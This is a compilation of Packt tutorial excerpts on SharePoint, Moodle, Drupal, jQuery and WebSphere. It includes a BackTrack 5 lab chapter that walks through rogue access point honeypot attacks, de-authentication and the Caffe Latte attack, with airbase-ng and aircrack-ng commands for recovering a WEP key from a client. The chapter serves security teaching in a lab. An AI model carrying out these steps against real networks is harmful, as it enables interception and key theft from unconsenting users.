                    string DescriptionFieldSchema = "<Field Type='Note' DisplayName='Item Description' Name='Description' Required='True' MaxLength='500' NumLines='10' />";
                    list.Fields.AddFieldAsXml(DescriptionFieldSchema, true, AddFieldOptions.AddToDefaultContentType);

                    // Insert 10 rows of data - concatenate the loop counter with the "Item number" string.
                    for (int i = 1; i < 11; ++i)
                    {
                        ListItemCreationInformation listItemCreationInfo = new ListItemCreationInformation();
                        ListItem li = list.AddItem(listItemCreationInfo);
                        li["Title"] = string.Format("Item number {0}", i);
                        li["Item_x0020_Description"] = string.Format("Item number {0} from client Object Model", i);
                        li.Update();
                    }

                    clientCtx.ExecuteQuery();
                    Console.WriteLine("List creation completed");
                    Console.Read();
                }
            }
        }
    }

7. Build and execute the solution by pressing F5 or from the menu Debug | Start Debugging.
This should bring up the command window with a message indicating that list creation completed. Press Enter and close the command window. Navigate to your site to verify that the list has been created with the new field and the ten inserted items.

How it works...

The first line of code in the Main method creates an instance of the ClientContext class. The ClientContext instance provides information about the SharePoint server context in which we will be working; it is also the proxy for the server we will be working with. We passed the URL information to the context to get the entry point to that location. When you have access to the context instance, you can browse the site, web, and list objects of that location, and you can access all their properties, such as Name, Title, Description, and so on. The ClientContext class implements the IDisposable interface, and hence you need to use the using statement; without it you have to explicitly dispose of the object, and if you do not, your application will have memory leaks. For more information on disposing of objects, refer to MSDN at: http://msdn.microsoft.com/en-us/library/ee557362.aspx

From the context we obtained access to our site object, on which we wanted to create the list. We provided the properties for our new list through the ListCreationInformation instance. Through ListCreationInformation, we set list properties such as the name, the template we want to use, whether the list should be shown in the quick launch bar, and so on. We added a new field to the field collection of the list by providing the field schema. Each ListItem is created by providing ListItemCreationInformation. ListItemCreationInformation is similar to ListCreationInformation, in that you provide information regarding the list item, such as whether it belongs to a document library or not, and so on. For more information on ListCreationInformation and ListItemCreationInformation members, refer to MSDN at: http://msdn.microsoft.com/en-us/library/ee536774.aspx

All of this information is structured as XML and batched together to be sent to the server. In our case, we created a list, added a new field, and added about ten list items. Each of these has an equivalent server-side call, and hence all these calls were batched together and sent to the server. The request is only sent when we issue an ExecuteQuery or ExecuteQueryAsync method call on the client context. The ExecuteQuery method creates an XML request and passes it to Client.svc. The application waits until the batch process on the server is completed and then returns with the JSON response. Client.svc makes the server Object Model calls needed to execute our request.

There's more...

By default, the ClientContext instance uses Windows authentication. It makes use of the Windows identity of the person executing the application. Hence, the person running the application should have proper authorization on the site to execute the commands; exceptions will be thrown if proper permissions are not available for the user executing the application. We will learn about handling exceptions in the next recipe. ClientContext also supports Anonymous and FBA (ASP.NET forms-based authentication) authentication.
The following is the code for passing FBA credentials if your site supports it:

    using (ClientContext clientCtx = new ClientContext("http://intsp1"))
    {
        clientCtx.AuthenticationMode = ClientAuthenticationMode.FormsAuthentication;
        FormsAuthenticationLoginInfo fba = new FormsAuthenticationLoginInfo("username", "password");
        clientCtx.FormsAuthenticationLoginInfo = fba;
        // Business logic
    }

Impersonation

In order to impersonate, you can pass credential information to the ClientContext as shown in the following code:

    clientCtx.Credentials = new NetworkCredential("username", "password", "domainname");

Passing credential information this way is supported only in the Managed OM.
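As a complement to the creation recipe above, here is a small sketch (not from the book) of the other half of the batching model described in the How it works section: you queue what you want with Load, nothing goes over the wire until ExecuteQuery is called, and the response then populates the client objects. The site URL is a placeholder:

    using System;
    using Microsoft.SharePoint.Client;

    class ReadListsSample
    {
        static void Main()
        {
            // Placeholder URL; point this at your own site.
            using (ClientContext clientCtx = new ClientContext("http://intsp1"))
            {
                Web site = clientCtx.Web;

                // Queue the data we want; no network call happens yet.
                clientCtx.Load(site.Lists);

                // One round trip: the batched request goes to Client.svc here.
                clientCtx.ExecuteQuery();

                foreach (List list in site.Lists)
                {
                    Console.WriteLine("{0} ({1} items)", list.Title, list.ItemCount);
                }
            }
        }
    }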

BackTrack 5: Attacking the Client

Packt
28 Sep 2011
7 min read
(For more resources on BackTrack, see here.)

Honeypot and Mis-Association attacks

Normally, when a wireless client such as a laptop is turned on, it will probe for the networks it has previously connected to. These networks are stored in a list called the Preferred Network List (PNL) on Windows-based systems. Along with this list, it will display any networks available in its range. A hacker may do either of two things:

• Silently monitor the probes and bring up a fake access point with the same ESSID the client is searching for. This will cause the client to connect to the hacker machine, thinking it is the legitimate network.
• Create fake access points with the same ESSID as neighboring ones to confuse the user into connecting to him.

Such attacks are very easy to conduct in coffee shops and airports where a user might be looking for a Wi-Fi connection. These are called Honeypot attacks, and they happen due to Mis-Association to the hacker's access point when the client believes it is the legitimate one. In the next exercise, we will carry out both of these attacks in our lab.

Time for action - orchestrating a Mis-Association attack

Follow these instructions to get started:

1. In the previous labs, we used a client that had connected to the Wireless Lab access point. Let us switch on the client, but not the actual Wireless Lab access point.
2. Let us now run airodump-ng mon0 and check the output. You will very soon find the client in the not associated state, probing for Wireless Lab and the other SSIDs in its stored profile (Vivek, in this case).
3. To understand what is happening, let's run Wireshark and start sniffing on the mon0 interface. As expected, you might see a lot of packets that are not relevant to our analysis, so apply a Wireshark filter to display only Probe Request packets from the client MAC you are using. In my case, the filter would be wlan.fc.type_subtype == 0x04 && wlan.sa == 60:FB:42:D5:E4:01. You should now see Probe Request packets only from the client, for the SSIDs Vivek and Wireless Lab.
4. Let us now start a fake access point for the network Wireless Lab on the hacker machine. Within a minute or so, the client connects to us automatically. This shows how easy it is to lure un-associated clients.
5. Now we will try the second case, which is creating a fake access point Wireless Lab in the presence of the legitimate one. Let us turn our access point on to ensure that Wireless Lab is available to the client. For this experiment, we have set the access point channel to 3. Let the client connect to the access point; we can verify this from the airodump-ng screen.
6. Now let us bring up our fake access point with the SSID Wireless Lab. Notice that the client is still connected to the legitimate access point Wireless Lab.
7. We will now send broadcast De-Authentication messages to the client on behalf of the legitimate access point to break their connection.
8. Assuming the signal strength of our fake access point Wireless Lab is stronger at the client than that of the legitimate one, the client connects to our fake access point instead of the legitimate one. We can verify this by looking at the airodump-ng output and seeing the new association of the client with our fake access point.

What just happened?

We just created a Honeypot using the probed list from the client, and also using the same ESSID as that of neighboring access points.
In the first case, the client automatically connected to us as it was searching for the network. In the latter case, as we were closer to the client than the real access point, our signal strength was higher, and the client connected to us.

Have a go hero - forcing a client to connect to the Honeypot

In the preceding exercise, what do we do if the client does not automatically connect to us? We would have to send a De-Authentication packet to break the legitimate client-access point connection, and then, if our signal strength is higher, the client will connect to our spoofed access point. Try this out by connecting a client to a legitimate access point, and then forcing it to connect to our Honeypot.

Caffe Latte attack

In the Honeypot attack, we noticed that clients will continuously probe for SSIDs they have connected to previously. If the client had connected to an access point using WEP, operating systems such as Windows cache and store the WEP key. The next time the client connects to the same access point, the Windows wireless configuration manager automatically uses the stored key.

The Caffe Latte attack was invented by me, the author of this book, and was demonstrated at Toorcon 9, San Diego, USA. The Caffe Latte attack is a WEP attack that allows a hacker to retrieve the WEP key of the authorized network using just the client. The attack does not require the client to be anywhere near the authorized WEP network; it can crack the WEP key using just the isolated client. In the next exercise, we will retrieve the WEP key of a network from a client using the Caffe Latte attack.

Time for action - conducting the Caffe Latte attack

Follow these instructions to get started:

1. Let us first set up our legitimate access point with WEP for the network Wireless Lab, with the key ABCDEFABCDEFABCDEF12 in hex.
2. Let us connect our client to it and ensure that the connection is successful using airodump-ng.
3. Let us unplug the access point and ensure the client is in the un-associated state, searching for the WEP network Wireless Lab.
4. Now we use airbase-ng to bring up an access point with Wireless Lab as the SSID. As soon as the client connects to this access point, airbase-ng starts the Caffe Latte attack.
5. We now start airodump-ng to collect the data packets from this access point only, as we did before in the WEP-cracking case.
6. We also start aircrack-ng, as in the WEP-cracking exercise we did before, to begin the cracking process. The command line would be aircrack-ng filename, where filename is the name of the file created by airodump-ng.
7. Once we have enough WEP-encrypted packets, aircrack-ng succeeds in cracking the key.

What just happened?

We were successful in retrieving the WEP key from just the wireless client, without requiring an actual access point to be used or present in the vicinity. This is the power of the Caffe Latte attack. The attack works by bit-flipping and replaying ARP packets sent by the wireless client after it associates with the fake access point created by us. These bit-flipped ARP Request packets cause more ARP Response packets to be sent by the wireless client. Note that all these packets are encrypted using the WEP key stored on the client. Once we are able to gather a large number of these data packets, aircrack-ng is able to recover the WEP key easily.

Have a go hero - practice makes you perfect!

Try changing the WEP key and repeating the attack.
This is a difficult attack and requires some practice to orchestrate successfully. It would also be a good idea to use Wireshark and examine the traffic on the wireless network.
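For reference, the workflow above can be reduced to a short command sequence. This is a minimal sketch only, assuming the fake access point runs on channel 3 and the monitor-mode interface is mon0; the capture file prefix and the <fake-AP-MAC> placeholder are illustrative and must be replaced with your own values:

airbase-ng -c 3 -e "Wireless Lab" -W 1 -L mon0
# -L turns on the Caffe Latte attack; -W 1 marks the beacons as WEP

airodump-ng -c 3 --bssid <fake-AP-MAC> --write caffelatte mon0
# capture the replayed ARP traffic generated by the connected client

aircrack-ng caffelatte-01.cap
# crack the key once enough WEP data packets have been collected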
Introduction to Moodle

Packt
28 Sep 2011
5 min read
  (For more resources on Moodle, see here.) The Moodle philosophy Moodle is designed to support a style of learning called Social Constructionism. This style of learning is interactive. The social constructionist philosophy believes that people learn best when they interact with the learning material, construct new material for others, and interact with other students about the material. The difference between a traditional class and a class following the social constructionist philosophy is the difference between a lecture and a discussion. Moodle does not require you to use the social constructionist method for your courses. However, it best supports this method. For example, Moodle allows you to add several kinds of static course material. This is course material that a student reads, but does not interact with: Web pages Links to anything on the Web (including material on your Moodle site) A directory of files A label that displays any text or image However, Moodle also allows you to add interactive course material. This is course material that a student interacts with, by answering questions, entering text, or uploading files: Assignment (uploading files to be reviewed by the teacher) Choice (a single question) Lesson (a conditional, branching activity) Quiz (an online test) Moodle also offers activities where students interact with each other. These are used to create social course material: Chat (live online chat between students) Forum (you can have zero or more online bulletin boards for each course) Glossary (students and/or teachers can contribute terms to site-wide glossaries) Wiki (this is a familiar tool for collaboration to most younger students and many older students) Workshop (this supports the peer review and feedback of assignments that students upload) In addition, some of Moodle's add-on modules add even more types of interaction. For example, one add-on module enables students and teachers to schedule appointments with each other. The Moodle experience Because Moodle encourages interaction and exploration, your students' learning experience will often be non-linear. Moodle can be used to enforce a specific order upon a course, using something called conditional activities. Conditional activities can be arranged in a sequence. Your course can contain a mix of conditional and non-linear activities. In this section, I'll take you on a tour of a Moodle learning site. You will see the student's experience from the time that the student arrives at the site, through entering a course, to working through some material in the course. You will also see some student-to-student interaction, and some functions used by the teacher to manage the course. The Moodle Front Page The Front Page of your site is the first thing that most visitors will see. This section takes you on a tour of the Front Page of my demonstration site. Probably the best Moodle demo sites are http://demo.moodle.net/ and http://school.demo.moodle.net/. Arriving at the site When a visitor arrives at a learning site, the visitor sees the Front Page. You can require the visitor to register and log in before seeing any part of your site, or you can allow an anonymous visitor to see a lot of information about the site on the Front Page, which is what I have done: (Move the mouse over the image to enlarge.) One of the first things that a visitor will notice is the announcement at the top and centre of the page, Moodle 2.0 Book Almost Ready!. 
Below the announcement are two activities: a quiz, Win a Prize: Test Your Knowledge of E-mail History, and a chat room, Global Chat Room. Selecting either of these activities will require to the visitor to register with the site, as shown in the following screenshot: Anonymous, guest, and registered access Notice the line Some courses may allow guest access at the middle of the page. You can set three levels of access for your site, and for individual courses: Anonymous access allows anyone to see the contents of your site's Front Page. Notice that there is no Anonymous access for courses. Even if a course is open to Guests, the visitor must either manually log in as the user Guest, or you must configure the site to automatically log in a visitor as Guest. Guest access requires the user to login as Guest. This allows you to track usage, by looking at the statistics for the user Guest. However, as everyone is logged in as the user Guest, you can't track individual users. Registered access requires the user to register on your site. You can allow people to register with or without e-mail confirmation, require a special code for enrolment, manually create their accounts yourself, import accounts from another system, or use an outside system (like an LDAP server) for your accounts. The Main menu Returning to the Front Page, notice the Main menu in the upper-left corner. This menu consists of two documents that tell the user what the site is about, and how to use it. In Moodle, icons tell the user what kind of resource will be accessed by a link. In this case, the icon tells the user that the first resource is a PDF (Adobe Acrobat) document, and the second is a web page. Course materials that students observe or read, such as web or text pages, hyperlinks, and multimedia files are called Resources.

Drupal 7 Social Networking: Managing Users and Profiles

Packt
27 Sep 2011
9 min read
  (For more resources on Drupal, see here.) What are we going to do and why? Before we get started, let's take a closer look at what we are going to do in this article and why. At the moment, our users can interact with the website and contribute content, including through their own personal blog. Apart from the blog, there isn't a great deal which differentiates our users; they are simply a username with a blog! One key improvement to make now is to make provisions for customizable user profiles. Our site being a social network with a dinosaur theme, the following would be useful information to have on our users: Details of their pet dinosaurs, including: Name Breed Date of birth Hobbies Their details for other social networking sites; for example, links to their Facebook profile, Twitter account, or LinkedIn page Location of the user (city / area) Their web address (if they have their own website) Some of these can be added to user profiles by adding new fields to profiles, using the built-in Field API; however, we will also install some additional modules to extend the default offering. Many websites allow users to upload an image to associate with their user account, either a photograph or an avatar to represent them. Drupal has provisions for this, but it has some drawbacks which can be fixed using Gravatar. Gravatar is a social avatar service through which users upload their avatar, which is then accessed by other websites that request the avatar using the user's e-mail address. This is convenient for our users, as it saves them having to upload their avatars to our site, and reduces the amount of data stored on our site, as well as the amount of data being transferred to and from our site. Since not all users will want to use a third-party service for their avatars (particularly users who are not already signed up to Gravatar), we can let them upload their own avatars if they wish, through the Upload module. There are many other social networking sites out there, which don't compete with ours, and are more generalized; as a result, we might want to allow our users to promote their profiles for other social networks too. We can download and install the Follow module, which will allow users to publicize their profiles for other social networking sites on their profile on our site. Once our users get to know each other more, they may become more interested in each other's posts and topics and may wish to look up a specific user's contribution to the site. The Tracker module allows users to track one another's contributions to the site. It is a core module, which just needs to be enabled and set up. Now that we have a better idea of what we are going to do in this article, let's get started! Getting set up As this article covers features provided by both core modules and contributed modules (which need to be downloaded first), let's download and enable the modules first, saving us the need for continually downloading and enabling modules throughout the article. The modules which we will require are: Tracker (core module) Gravatar (can be downloaded from: http://drupal.org/project/gravatar) Follow (can be downloaded from: http://drupal.org/project/follow) Field_collection (can be downloaded from: http://drupal.org/project/field_collection) Entity (can be downloaded from: http://drupal.org/project/entity) Trigger module (core module) These modules can be downloaded and then the contents extracted to the /sites/all/modules folder within our Drupal installation. 
Once extracted they will then be ready to be enabled within the Modules section of our admin area. Users, roles, and permissions Let's take a detailed look at users, roles, and permissions and how they all fit together. Users, roles, and permissions are all managed from the People section of the administration area: User management Within the People section, users are listed by default on the main screen. These are user accounts which are either created by us, as administrators, or created when a visitor to our site signs up for a user account. From here we can search for particular types of users, create new users, and edit users—including updating their profiles, suspending their account, or delete them permanently from our social network. Once our site starts to gain popularity it will become more difficult for us to navigate through the user list. Thankfully there are search, sort, and filter features available to make this easier for us. Let's start by taking a look at our user list: (Move the mouse over the image to enlarge.) This user list shows, for each user: Their username If their user account is active or blocked (their status) The roles which are associated with their account How long they have been a member of our community When they last accessed our site A link to edit the user's account Users: Viewing, searching, sorting, and filtering Clicking on a username will take us to the profile of that particular user, allowing us to view their profile as normal. Clicking one of the headings in the user list allows us to sort the list from the field we selected: This could be particularly useful to see who our latest members are, or to allow us to see which users are blocked, if we need to reactivate a particular account. We can also filter the user list based on a particular role that is assigned to a user, a particular permission they have (by virtue of their roles), or by their status (if their account is active or blocked). This is managed from the SHOW ONLY USERS WHERE panel: Creating a user Within the People area, there is a link Add user, which will allow us to create a new user account for our site: This takes us to the new user page where we are required to fill out the Username, E-mail address, and Password (twice to confirm) for the new user account we wish to create. We can also select the status of the user (Active or Blocked), any roles we wish to apply to their account, and indicate if we want to automatically e-mail the user to notify them of their new account: Editing a user To edit a user account we simply need to click the edit link displayed next to the user in the user list. This takes us to a page similar to the create user screen, except that it is pre-populated with the users details. It also contains a few other settings related to some default installed modules. As we install new modules, the page may include more options. Inform the user! If you are planning to change a user's username, password, or e-mail address you should notify them of the change, otherwise they may struggle the next time they try to log in! Suspending / blocking a user If we need to block or suspend a user, we can do this from the edit screen by updating their status to Blocked: This would prevent the user from accessing our site. For example, if a user had been posting inappropriate material, even after a number of warnings, we could block their account to prevent them from accessing the site. Why block? Why not just delete? 
If we were to simply delete a user who was troublesome on the site, they could simply sign up again (unless we went to a separate area and also blocked their e-mail address and username). Of course, the user could still sign up again using a different e-mail address and a different username, but this helps us keep things under control. Canceling and deleting a user account Also within the edit screen is the option to cancel a user's account: On clicking the Cancel account button, we are given a number of options for how we wish to cancel the account: The first and third options will at least keep the context of any discussions or contributions to which the user was involved with. The second option will unpublish their content, so if for example comments or pages are removed which have an impact on the community, we can at least re-enable them. The final option will delete the account and all content associated with it. Finally, we can also select if the user themselves must confirm that they wish to have their account deleted. Particularly useful if this is in response to a request from the user to delete all of their data, they can be given a final chance to change their mind. Bulk user operations For occasions when we need to perform specific operations to a range of user accounts (for example, unblocking a number of users, or adding / removing roles from specific users) we can use the Update options panel, in the user list to do these: From here we simply select the users we want to apply an action to, and then select one of the following options from the UPDATE OPTIONS list: Unblock the selected users Block the selected users Cancel the selected user accounts Add a role to the selected users Remove a role from the selected users Roles Users are grouped into a number of roles, which in turn have permissions assigned to them. By default there are three roles within Drupal: Administrators Anonymous users Authenticated users The anonymous and authenticated roles can be edited but they cannot be renamed or deleted. We can manage user roles by navigating to People | Permissions | Roles: The edit permissions link allows us to edit the permissions associated with a specific role. To create a new role, we simply need to enter the name for the role in the text box provided and click the Add role button.  

Learning jQuery

Packt
27 Sep 2011
9 min read
  (For more resources on jQuery, see here.) Custom events The events that are triggered naturally by the DOM implementations of browsers are crucial to any interactive web application. However, we are not limited to this set of events in our jQuery code. We can freely add our own custom events to the repertoire. Custom events must be triggered manually by our code. In a sense, they are like regular functions that we define, in that we can cause a block of code to be executed when we invoke it from another place in the script. The .bind() call corresponds to a function definition and the .trigger() call to a function invocation. However, event handlers are decoupled from the code that triggers them. This means that we can trigger events at any time, without knowing in advance what will happen when we do. We might cause a single bound event handler to execute, as with a regular function. We also might cause multiple handlers to run or even none at all. In order to illustrate this, we can revise our Ajax loading feature to use a custom event. We will trigger a nextPage event whenever the user requests more photos and bind handlers that watch for this event and perform the work previously done by the .click() handler as follows: $(document).ready(function() { $('#more-photos').click(function() { $(this).trigger('nextPage'); return false; }); }); The .click() handler now does very little work itself. After triggering the custom event, it prevents the default behavior by returning false. The heavy lifting is transferred to the new event handlers for the nextPage event as follows: (function($) { $(document).bind('nextPage', function() { var url = $('#more-photos').attr('href'); if (url) { $.get(url, function(data) { $('#gallery').append(data); }); } }); var pageNum = 1; $(document).bind('nextPage', function() { pageNum++; if (pageNum < 20) { $('#more-photos') .attr('href', 'pages/' + pageNum + '.html'); } else { $('#more-photos').remove(); } }); })(jQuery); The largest difference is that we have split what was once a single function into two. This is simply to illustrate that a single event trigger can cause multiple bound handlers to fire. The other point to note is that we are illustrating another application of event bubbling here. Our nextPage handlers could be bound to the link that triggers the event, but we would need to wait to do this until the DOM was ready. Instead, we are binding the handlers to the document itself, which is available immediately, so we can do the binding outside of $(document).ready(). The event bubbles up and, so long as another handler does not stop the event propagation, our handlers will be fired. Infinite scrolling Just as multiple event handlers can react to the same triggered event, the same event can be triggered in multiple ways. We can demonstrate this by adding an infinite scrolling feature to our page. This popular technique lets the user's scroll bar manage the loading of content, fetching additional content whenever the user reaches the end of what has been loaded thus far. We will begin with a simple implementation, and then improve it in successive examples. 
The basic idea is to observe the scroll event, measure the current scroll bar position when scrolling occurs, and load the new content if needed, as follows: (function($) { var $window = $(window); function checkScrollPosition() { var distance = $window.scrollTop() + $window.height(); if ($('#container').height() <= distance) { $(document).trigger('nextPage'); } } $(document).ready(function() { $window.scroll(checkScrollPosition).scroll(); }); })(jQuery); The new checkScrollPosition() function is set as a handler for the window's scroll event. This function computes the distance from the top of the document to the bottom of the window, and then compares this distance to the total height of the main container in the document. As soon as these reach equality, we need to fill the page with additional photos, so we trigger the nextPage event. As soon as we bind the scroll handler, we immediately trigger it with a call to .scroll(). This kick-starts the process, so that if the page is not initially filled with photos, an Ajax request is made right away. Custom event parameters When we define functions, we can set up any number of parameters to be filled with argument values when we actually call the function. Similarly, when triggering a custom event, we may want to pass along additional information to any registered event handlers. We can accomplish this by using custom event parameters. The first parameter defined for any event handler, as we have seen, is the DOM event object as enhanced and extended by jQuery. Any additional parameters we define are available for our discretionary use. To see this action, we will add a new option to the nextPage event allowing us to scroll the page down to display the newly added content as follows: (function($) { $(document).bind('nextPage', function(event, scrollToVisible) { var url = $('#more-photos').attr('href'); if (url) { $.get(url, function(data) { var $data = $(data).appendTo('#gallery'); if (scrollToVisible) { var newTop = $data.offset().top; $(window).scrollTop(newTop); } checkScrollPosition(); }); } } ); }); We have now added a scrollToVisible parameter to the event callback. The value of this parameter determines whether we perform the new functionality, which entails measuring the position of the new content and scrolling to it. Measurement is easy using the .offset() method, which returns the top and left coordinates of the new content. In order to move down the page, we call the .scrollTop() method. Now we need to pass an argument into the new parameter. All that is required is providing an extra value when invoking the event using .trigger(). When newPage is triggered through scrolling, we don't want the new behavior to occur, as the user is already manipulating the scroll position directly. When the More Photos link is clicked, on the other hand, we want the newly added photos to be displayed on the screen, so we will pass a value of true to the handler as follows: $(document).ready(function() { $('#more-photos').click(function() { $(this).trigger('nextPage', [true]); return false; }); $window.scroll(checkScrollPosition).scroll(); }); In the call to .trigger(), we are now providing an array of values to pass to event handlers. In this case, the value of true will be given to the scrollToVisible parameter of the event handler. Note that custom event parameters are optional on both sides of the transaction. 
We have two calls to .trigger() in our code, only one of which provides argument values; when the other is called, this does not result in an error, but rather the value of null is passed to each parameter. Similarly, the lack of a scrollToVisible parameter in one of our .bind('nextPage') calls is not an error; if a parameter does not exist when an argument is passed, that argument is simply ignored. Throttling events A major issue with the infinite scrolling feature as we have implemented it is its performance impact. While our code is brief, the checkScrollPosition() function does need to do some work to measure the dimensions of the page and window. This effort can accumulate rapidly, because in some browsers the scroll event is triggered repeatedly during the scrolling of the window. The result of this combination could be choppy or sluggish performance. Several native events have the potential for frequent triggering. Common culprits include scroll, resize, and mousemove. To account for this, we need to limit our expensive calculations, so that they only occur after some of the event instances, rather than each one. This technique is known as event throttling. $(document).ready(function() { var timer = 0; $window.scroll(function() { if (!timer) { timer = setTimeout(function() { checkScrollPosition(); timer = 0; }, 250); } }).scroll(); }); Rather than setting checkScrollPosition() directly as the scroll event handler, we are using the JavaScript setTimeout function to defer the call by 250 milliseconds. More importantly, we are checking for a currently running timer first before performing any work. As checking the value of a simple variable is extremely fast, most of the calls to our event handler will return almost immediately. The checkScrollPosition() call will only happen when a timer completes, which will at most be every 250 milliseconds. We can easily adjust the setTimeout() value to a comfortable number that strikes a reasonable compromise between instant feedback and low performance impact. Our script is now a good web citizen. Other ways to perform throttling The throttling technique we have implemented is efficient and simple, but it is not the only solution. Depending on the performance characteristics of the action being throttled and typical interaction with the page, we may for instance want to institute a single timer for the page rather than create one when an event begins: $(document).ready(function() { var scrolled = false; $window.scroll(function() { scrolled = true; }); setInterval(function() { if (scrolled) { checkScrollPosition(); scrolled = false; } }, 250); checkScrollPosition(); }); Unlike our previous throttling code, this polling solution uses a single setInterval() call to begin checking the state of the scrolled variable every 250 milliseconds. Any time a scroll event occurs, scrolled is set to true, ensuring that the next time the interval passes, checkScrollPosition() will be called. A third solution for limiting the amount of processing performed during frequently repeated events is debouncing. This technique, named after the post-processing required handling repeated signals sent by electrical switches, ensures that only a single, final event is acted upon even when many have occurred. Deferred objects In jQuery 1.5, a concept known as a deferred object was introduced to the library. A deferred object encapsulates an operation that takes some time to complete. 
These objects allow us to easily handle situations in which we want to act when a process completes, but we don't necessarily know how long the process will take or even if it will be successful. A new deferred object can be created at any time by calling the $.Deferred() constructor. Once we have such an object, we can perform long-lasting operations and then call the .resolve() or .reject() methods on the object to indicate the operation was successful or unsuccessful. It is somewhat unusual to do this manually, however. Typically, rather than creating our own deferred objects by hand, jQuery or its plugins will create the object and take care of resolving or rejecting it. We just need to learn how to use the object that is created. Creating deferred objects is a very advanced topic. Rather than detailing how the $.Deferred() constructor operates, we will focus here on how jQuery effects take advantage of deferred objects.  
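Although the text goes on to look at effects, a quick illustrative sketch (not from the original example code) shows the idea using the Ajax calls we have been making all along: since jQuery 1.5, helpers such as $.get() return a deferred-style object, so success and failure handlers can be attached after the fact. The URL and selectors below simply reuse the gallery example and are otherwise assumptions:

// Start the long-running operation; $.get() returns a promise-like object
var loading = $.get('pages/2.html');

// Runs only if the request eventually succeeds
loading.done(function(data) {
  $('#gallery').append(data);
});

// Runs only if the request fails, however long that takes to determine
loading.fail(function() {
  $('#more-photos').remove();
});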

IBM WebSphere Application Server: Administration Tools

Packt
23 Sep 2011
9 min read
  (For more resources on IBM, see here.) Dumping namespaces To diagnose a problem, you might need to collect WAS JNDI information. WebSphere Application Server provides a utility that dumps the JNDI namespace. The dumpNamespace.sh script dumps information about the WAS namespace and is very useful when debugging applications when JNDI errors are seen in WAS logs. You can use this utility to dump the namespace to see the JNDI tree that the WAS name server (WAS JNDI lookup service provider) is providing for applications. This tool is very useful in JNDI problem determination, for example, when debugging incorrect JNDI resource mappings in the case where an application resource is not mapped correctly to a WAS-configured resource or the application is using direct JNDI lookups when really it should be using indirect lookups. For this tool to work, WAS must be running when this utility is run. To run the utility, use the following syntax: ./dumpNameSpace.sh -<command_option> There are many options for this tool and the following table lists the command-line options available by typing the command <was_root>/dumpsnameSpace.sh -help: Command option Description -host <host> Bootstrap host, that is, the WebSphere host whose namespace you want to dump. Defaults to localhost. -port <port> Bootstrap port. Defaults to 2809. -user <name> Username for authentication if security is enabled on the server. Acts the same way as the -username keyword. -username <name> Username for authentication if security is enabled on the server. Acts the same way as the -user keyword. -password <password> Password for authentication, if security is enabled in the server. -factory <factory> The initial context factory to be used to get the JNDI initial context. Defaults to com.ibm.websphere.naming. WsnInitialContextFactory and normally does not need to be changed. -root [ cell | server | node | host | legacy | tree | default ] Scope of the namespace to dump. For WS 5.0 or later: cell: DumpNameSpace default. Dump the tree starting at the cell root context. server: Dump the tree starting at the server root context. node: Dump the tree starting at the node root context. (Synonymous with host) For WS 4.0 or later: legacy: DumpNameSpace default. Dump the tree starting at the legacy root context. host: Dump the tree starting at the bootstrap host root context. (Synonymous with node) tree: Dump the tree starting at the tree root context. For all WebSphere and other name servers: default: Dump the tree starting at the initial context, which JNDI returns by default for that server type. This is the only -root choice that is compatible with WebSphere servers prior to 4.0 and with non-WebSphere name servers. The WebSphere initial JNDI context factory (default) obtains the desired root by specifying a key specific to the server type when requesting an initial CosNaming NamingContext reference. The default roots and the corresponding keys used for the various server types are listed as follows: WebSphere 5.0: Server root context. This is the initial reference registered under the key of NameServiceServerRoot on the server. WebSphere 4.0: Legacy root context. This context is bound under the name domain/legacyRoot, in the initial context registered on the server, under the key NameService. WebSphere 3.5: Initial reference registered under the key of NameService, on the server. Non-WebSphere: Initial reference registered under the key of NameService, on the server. 
-url <url> The value for the java.naming.provider.url property used to get the initial JNDI context. This option can be used in place of the -host, -port, and -root options. If the -url option is specified, the -host,-port, and -root options are ignored. -startAt <some/subcontext/ in/the/tree> The path from the requested root context to the top-level context, where the dump should begin. Recursively dumps (displays a tree-like structure) the sub-contexts of each namespace context. Defaults to empty string, that is, root context requested with the -root option. -format [ jndi | ins ] jndi: Display name components as atomic strings. ins: Display name components parsed per INS rules (id.kind) The default format is jndi. -report [ short | long ] short: Dumps the binding name and bound object type, which is essentially what JNDI Context. list() provides. long: Dumps the binding name, bound object type, local object type, and string representation of the local object, that is, Interoperable Object References (IORs) string values, and so on, are printed). The default report option is short. -traceString <some.package. to.trace.*=all> Trace string of the same format used with servers, with output going to the DumpNameSpaceTrace.out file. Example name space dump To see the result of using the namespace tool, navigate to the <was_root>/bin directory on your Linux server and type the following command: For Linux: ./dumpNameSpace.sh -root cell -report short -username wasadmin -password wasadmin >> /tmp/jnditree.txt For Windows: ./dumpNameSpace.bat -root cell -report short -username wasadmin -password wasadmin > c:tempjnditree.txt The following screenshot shows a few segments of the contents of an example jnditree.txt file which would contain the output of the previous command. EAR expander Sometimes during application debugging or automated application deployment, you may need to enquire about the contents of an Enterprise Archive (EAR) file. An EAR file is made up of one or more WAR files (web applications), one or more Enterprise JavaBeans (EJBs), and there can be shared JAR files as well. Also, within each WAR file, there may be JAR files as well. The EARExpander.sh utility allows all artifacts to be fully decompressed much as expanding a TAR file. Usage syntax: EARExpander -ear (name of the input EAR file for the expand operation or name of the output EAR file for the collapse operation) -operationDir (directory to which the EAR file is expanded or directory from which the EAR file is collapsed) -operation (expand | collapse) [-expansionFlags (all | war)] [-verbose] To demonstrate the utility, we will expand the HRListerEAR.ear file. Ensure that you have uploaded the HRListerEAR.ear file to a new folder called /tmp/EARExpander on your Linux server or an appropriate alternative location and run the following command: For Linux: <was_root>/bin/EARExpander.sh -ear /tmp/HRListerEAR.ear -operationDir /tmp/expanded -operation expand -expansionFlags all -verbose For Windows: <was_root>binEARExpander.bat -ear c:tempHRListerEAR.ear -operationDir c:tempexpanded -operation expand -expansionFlags all -verbose The result will be an expanded on-disk structure of the contents of the entire EAR file, as shown in the following screenshot: An example of everyday use could be that EARExpander.sh is used as part of a deployment script where an EAR file is expanded and hardcoded properties files are searched and replaced. 
